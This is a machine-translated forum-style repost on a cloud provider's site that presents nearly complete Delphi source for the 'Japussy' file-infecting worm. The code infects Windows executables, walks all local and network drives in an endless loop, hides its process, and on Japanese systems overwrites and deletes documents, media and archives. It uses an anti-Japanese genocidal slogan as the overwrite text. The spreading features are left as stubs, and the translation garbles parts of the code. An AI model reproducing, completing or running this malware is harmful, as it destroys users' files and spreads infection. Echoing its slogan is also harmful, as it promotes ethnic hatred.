Pandatv's core code

Last Update:2018-12-08 Source: Internet

Author: User

Tags high cpu usage

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

I have read it. It was written in Delphi. According to the notes, it should be the D5SP1 version. I used D7SP1 to handle a few issues. The compilation was successful, but I didn't dare to try it, I don't know which one wants to try it. hey hey .. Copy codeThe Code is as follows: program Japussy;
Uses
Windows, SysUtils, Classes, Graphics, ShellAPI {, Registry };
Const
HeaderSize = 82432; // the size of the virus.
IconOffset = $12EB8; // offset of the primary graph of the PE File
// The size obtained by compiling on my Delphi5 SP1. The Delphi of other versions may be different.
// Search for the hexadecimal string of 2800000020 to find the offset of the primary graph.
{
HeaderSize = 38912; // the size of the virus body compressed by Upx
IconOffset = $ 92BC; // the offset of the Upx compressed over the main graph of the PE File
// Upx 1.24 W usage: upx-9 -- 8086 Japussy.exe
}
IconSize = $2E8; // the size of the master image of the PE file, which is 744 bytes.
IconTail = IconOffset + IconSize; // end of the Main chart of the PE File
ID = $44444444; // infection mark
// LJ code for writing
Catchword = ''If a race need to be killed out, it must be Yamato.'' +
''If a country need to be destroyed, it must be Japan! ''+
''*** W32.Japussy. Worm. ***'';
{$ R *. RES}
Function RegisterServiceProcess (dwProcessID, dwType: Integer): Integer;
StDCall; external ''kernel32. dll ''; // function declaration
Var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; // Japanese OS tag
{Judge whether it is Win9x}
Function IsWin9x: Boolean;
Var
Ver: TOSVersionInfo;
Begin
Result: = False;
Ver. dwOSVersionInfoSize: = SizeOf (TOSVersionInfo );
If not GetVersionEx (Ver) then
Exit;
If (Ver. dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then // Win9x
Result: = True;
End;
{Copying between streams}
Procedure CopyStream (Src: TStream; sStartPos: Integer; Dst: TStream;
DStartPos: Integer; Count: Integer );
Var
SCurPos, dCurPos: Integer;
Begin
SCurPos: = Src. Position;
DCurPos: = Dst. Position;
Src. Seek (sStartPos, 0 );
Dst. Seek (dStartPos, 0 );
Dst. CopyFrom (Src, Count );
Src. Seek (sCurPos, 0 );
Dst. Seek (dCurPos, 0 );
End;
{Separating the host file from the infected PE file for use}
Procedure ExtractFile (FileName: string );
Var
SStream, dStream: TFileStream;
Begin
Try
SStream: = TFileStream. Create (ParamStr (0), fmOpenRead or fmShareDenyNone );
Try
DStream: = TFileStream. Create (FileName, fmCreate );
Try
SStream. Seek (HeaderSize, 0); // skip the virus section of the header
DStream. CopyFrom (sStream, sStream. Size-HeaderSize );
Finally
DStream. Free;
End;
Finally
SStream. Free;
End;
Except
End;
End;
{Fill STARTUPINFO structure}
Procedure FillStartupInfo (var Si: STARTUPINFO; State: Word );
Begin
Si. cb: = SizeOf (Si );
Si. lpReserved: = nil;
Si. lpDesktop: = nil;
Si. lpTitle: = nil;
Si. dwFlags: = STARTF_USESHOWWINDOW;
Si. wShowWindow: = State;
Si. cbReserved2: = 0;
Si. lpReserved2: = nil;
End;
{Mail with virus}
Procedure SendMail;
Begin
// Who is willing to do this?
End;
{Infected PE file}
Procedure InfectOneFile (FileName: string );
Var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
IID: LongInt;
AIcon: TIcon;
Infected, IsPE: Boolean;
I: Integer;
Buf: array [0 .. 1] of Char;
Begin
Try // if an error occurs, the file is in use and exits.
If CompareText (FileName, ''japussy. EXE '') = 0 then // do not infect yourself
Exit;
Infected: = False;
IsPE: = False;
SrcStream: = TFileStream. Create (FileName, fmOpenRead );
Try
For I: = 0 to $108 do // check the PE File Header
Begin
SrcStream. Seek (I, soFromBeginning );
SrcStream. Read (Buf, 2 );
If (Buf [0] = #80) and (Buf [1] = #69) then // PE tag
Begin
IsPE: = True; // It is a PE file.
Break;
End;
End;
SrcStream. Seek (-4, soFromEnd); // check the infection mark
SrcStream. Read (iID, 4 );
If (iID = ID) or (SrcStream. Size <10240) then // files that are too small are not infected
Infected: = True;
Finally
SrcStream. Free;
End;
If Infected or (not IsPE) then // exit if the file is Infected or not a PE File
Exit;
IcoStream: = TMemoryStream. Create;
DstStream: = TMemoryStream. Create;
Try
AIcon: = TIcon. Create;
Try
// Obtain the master icon of the infected file (744 bytes) and store it to the stream.
AIcon. ReleaseHandle;
AIcon. Handle: = ExtractIcon (HInstance, PChar (FileName), 0 );
AIcon. SaveToStream (IcoStream );
Finally
AIcon. Free;
End;
SrcStream: = TFileStream. Create (FileName, fmOpenRead );
// Header file
HdrStream: = TFileStream. Create (ParamStr (0), fmOpenRead or fmShareDenyNone );
Try
// Write data before the main icon of the virus.
CopyStream (HdrStream, 0, DstStream, 0, IconOffset );
// Write the main icon of the current program
CopyStream (IcoStream, 22, DstStream, IconOffset, IconSize );
// Write data between the main icon of the virus and the end of the virus.
CopyStream (HdrStream, IconTail, DstStream, IconTail, HeaderSize-IconTail );
// Write the Host Program
CopyStream (SrcStream, 0, DstStream, HeaderSize, SrcStream. Size );
// Write the infected mark
DstStream. Seek (0, 2 );
IID: = $44444444;
DstStream. Write (iID, 4 );
Finally
HdrStream. Free;
End;
Finally
SrcStream. Free;
IcoStream. Free;
DstStream. SaveToFile (FileName); // Replace the host file
DstStream. Free;
End;
Except;
End;
End;
{Write the target file to the LJ code and delete it}
Procedure SmashFile (FileName: string );
Var
FileHandle: Integer;
I, Size, Mass, Max, Len: Integer;
Begin
Try
SetFileAttributes (PChar (FileName), 0); // remove the read-only attribute
FileHandle: = FileOpen (FileName, fmOpenWrite); // open the file
Try
Size: = GetFileSize (FileHandle, nil); // File Size
I: = 0;
Randomize;
Max: = Random (15); // Random number of times the LJ code is written
If Max <5 then
Max: = 5;
Mass: = Size div Max; // Size of each interval Block
Len: = Length (Catchword );
While I <Max do
Begin
FileSeek (FileHandle, I * Mass, 0); // locate
// Write the LJ code to completely destroy the file
FileWrite (FileHandle, Catchword, Len );
Inc (I );
End;
Finally
FileClose (FileHandle); // close the file
End;
DeleteFile (PChar (FileName); // delete it
Except
End;
End;
{Get writable drive list}
Function GetDrives: string;
Var
DiskType: Word;
D: Char;
Str: string;
I: Integer;
Begin
For I: = 0 to 25 do // print 26 letters
Begin
D: = Chr (I + 65 );
Str: = D + ':';
DiskType: = GetDriveType (PChar (Str ));
// Obtain the local disk and Network Disk
If (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result: = Result + D;
End;
End;
{Traverse directories, infect and destroy files}
Procedure LoopFiles (Path, Mask: string );
Var
I, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
Function IsValidDir (SearchRec: TSearchRec): Integer;
Begin
If (SearchRec. Attr '.') and
(SearchRec. Name <> '..') then
Result: = 0 // not a directory
Else if (SearchRec. Attr = 16) and (SearchRec. Name <> '.') and
(SearchRec. Name <> '..') then
Result: = 1 // not the root directory
Else Result: = 2; // the root directory.
End;
Begin
If (FindFirst (Path + Mask, faAnyFile, SearchRec) = 0) then
Begin
Repeat
PeekMessage (Msg, 0, 0, 0, PM_REMOVE); // adjust the message queue to avoid suspicion.
If IsValidDir (SearchRec) = 0 then
Begin
Fn: = Path + SearchRec. Name;
Ext: = UpperCase (ExtractFileExt (Fn ));
If (Ext = '. EXE') or (Ext = '. SCR') then
Begin
InfectOneFile (Fn); // infect the executable file
End
Else if (Ext = '. htm') or (Ext ='. HTML ') or (Ext ='. ASP ') then
Begin
// Infect HTML and ASP files and write Base64-encoded viruses
// Infect all users who browse this page
// Which of the following is willing to do this?
End
Else if Ext = '. wab' then // Outlook Address Book File
Begin
// Obtain the Outlook Email Address
End
Else if Ext = '. ADC' then // the Foxmail address automatically completes the file.
Begin
// Obtain the Foxmail email address
End
Else if Ext = 'ind 'then // Foxmail Address Book File
Begin
// Obtain the Foxmail email address
End
Else
Begin
If IsJap then // the operating system of the plain text
Begin
If (Ext = '. DOC') or (Ext = '. XLS') or (Ext = '. MDB') or
(Ext = '. mp3') or (Ext ='. M') or (Ext = '. A') or
(Ext = '. wm') or (Ext ='. ZIP ') or (Ext ='. RAR ') or
(Ext = '. MPEG') or (Ext = '. asf') or (Ext ='. JPG ') or
(Ext = '. JPEG') or (Ext = '. GIF') or (Ext = '. SWF') or
(Ext = '. PDF') or (Ext = '. chm') or (Ext ='. avi') then
SmashFile (Fn); // destroy the file
End;
End;
End;
// After a file is infected or deleted, it sleeps for 200 milliseconds to avoid suspicion of high CPU usage.
Sleep (200 );
Until (FindNext (SearchRec) <> 0 );
End;
FindClose (SearchRec );
SubDir: = TStringList. Create;
If (FindFirst (Path + '*. *', faDirectory, SearchRec) = 0) then
Begin
Repeat
If IsValidDir (SearchRec) = 1 then
SubDir. Add (SearchRec. Name );
Until (FindNext (SearchRec) <> 0 );
End;
FindClose (SearchRec );
Count: = SubDir. Count-1;
For I: = 0 to Count do
LoopFiles (Path + SubDir. Strings + '', Mask );
FreeAndNil (SubDir );
End;
{Traverse all files on the disk}
Procedure InfectFiles;
Var
DriverList: string;
I, Len: Integer;
Begin
If GetACP = 932 then // Japanese Operating System
IsJap: = True; // Let's die!
DriverList: = GetDrives; // obtain the writable disk list.
Len: = Length (DriverList );
While True do // Infinite Loop
Begin
For I: = Len downto 1 do // traverse each disk drive
LoopFiles (DriverList + ':', '*. *'); // infected
SendMail; // send a mail with a virus
Sleep (1000*60*5); // Sleep for 5 minutes
End;
End;
{Main program start}
Begin
If IsWin9x then // is Win9x
RegisterServiceProcess (GetCurrentProcessID, 1) // register as a service process
Else // WinNT
Begin
// Remote thread ing to Explorer process
// Which station is willing to complete?
End;
// If it is the original virus
If CompareText (ExtractFileName (ParamStr (0), 'Japussy.exe ') = 0 then
InfectFiles // infect and send emails
Else // has been parasitic on the host Program and started to work
Begin
TmpFile: = ParamStr (0); // create a temporary file
Delete (TmpFile, Length (TmpFile)-4, 4 );
TmpFile: = TmpFile + #32 + '.exe '; // real host file with one more space
ExtractFile (TmpFile); // separated
FillStartupInfo (Si, SW_SHOWDEFAULT );
CreateProcess (PChar (TmpFile), PChar (TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); // create a new process to run
InfectFiles; // infect and send emails
End;
End.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More